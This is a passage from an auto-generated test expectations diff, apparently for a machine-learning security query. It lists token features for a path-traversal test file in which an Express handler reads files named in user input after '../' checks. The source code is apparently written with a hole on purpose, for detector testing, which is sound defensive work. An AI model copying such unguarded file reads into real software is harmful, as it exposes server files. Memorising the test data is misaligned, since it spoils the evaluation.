relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:16 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:16 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:26 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:26 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:26 | pathModule.normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:26 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:26 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:40 | exceptional return of pathMod ... vePath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:40 | exceptional return of pathMod ... vePath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:40 | exceptional return of pathMod ... vePath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:40 | exceptional return of pathMod ... vePath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:40 | exceptional return of pathMod ... vePath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:40 | pathMod ... vePath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:40 | pathMod ... vePath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:40 | pathMod ... vePath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:40 | pathMod ... vePath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:40 | pathMod ... vePath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:55 | exceptional return of pathMod ... ('../') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:55 | exceptional return of pathMod ... ('../') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:55 | exceptional return of pathMod ... ('../') | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:55 | exceptional return of pathMod ... ('../') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:55 | exceptional return of pathMod ... ('../') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:55 | pathMod ... ('../') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:55 | pathMod ... ('../') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:55 | pathMod ... ('../') | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:55 | pathMod ... ('../') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:55 | pathMod ... ('../') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:61 | pathMod ... ) === 0 | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:61 | pathMod ... ) === 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:61 | pathMod ... ) === 0 | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:61 | pathMod ... ) === 0 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:61 | pathMod ... ) === 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:285:18:285:26 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:285:18:285:26 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:285:18:285:26 | normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:285:18:285:26 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:285:18:285:26 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:285:28:285:39 | relativePath | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:285:28:285:39 | relativePath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:285:28:285:39 | relativePath | calleeImports | path | @@ -9177,6 +77192,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:285:28:285:39 | relativePath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:285:28:285:39 | relativePath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:285:28:285:39 | relativePath | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:285:42:285:48 | indexOf | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:285:42:285:48 | indexOf | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:285:42:285:48 | indexOf | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:285:42:285:48 | indexOf | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:285:42:285:48 | indexOf | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:285:50:285:54 | '../' | CalleeFlexibleAccessPath | pathModule.normalize().indexOf | | autogenerated/TaintedPath/normalizedPaths.js:285:50:285:54 | '../' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:285:50:285:54 | '../' | calleeImports | path | @@ -9185,6 +77205,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:285:50:285:54 | '../' | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | | autogenerated/TaintedPath/normalizedPaths.js:285:50:285:54 | '../' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:285:50:285:54 | '../' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:285:61:285:61 | 0 | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:285:61:285:61 | 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:285:61:285:61 | 0 | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:285:61:285:61 | 0 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:285:61:285:61 | 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:28 | exceptional return of fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:28 | exceptional return of fs.read ... ewpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:28 | exceptional return of fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:28 | fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:28 | fs.read ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:28 | fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:28 | fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:286:5:286:28 | fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:286:8:286:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:286:8:286:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:286:8:286:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:286:8:286:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:286:8:286:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:286:21:286:27 | newpath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:286:21:286:27 | newpath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:286:21:286:27 | newpath | calleeImports | fs | @@ -9194,6 +77244,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:286:21:286:27 | newpath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:286:21:286:27 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:286:21:286:27 | newpath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:28 | exceptional return of fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:28 | exceptional return of fs.read ... ewpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:28 | exceptional return of fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:28 | fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:28 | fs.read ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:28 | fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:28 | fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:288:5:288:28 | fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:288:8:288:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:288:8:288:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:288:8:288:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:288:8:288:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:288:8:288:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:288:21:288:27 | newpath | CalleeFlexibleAccessPath | fs.readFileSync | | 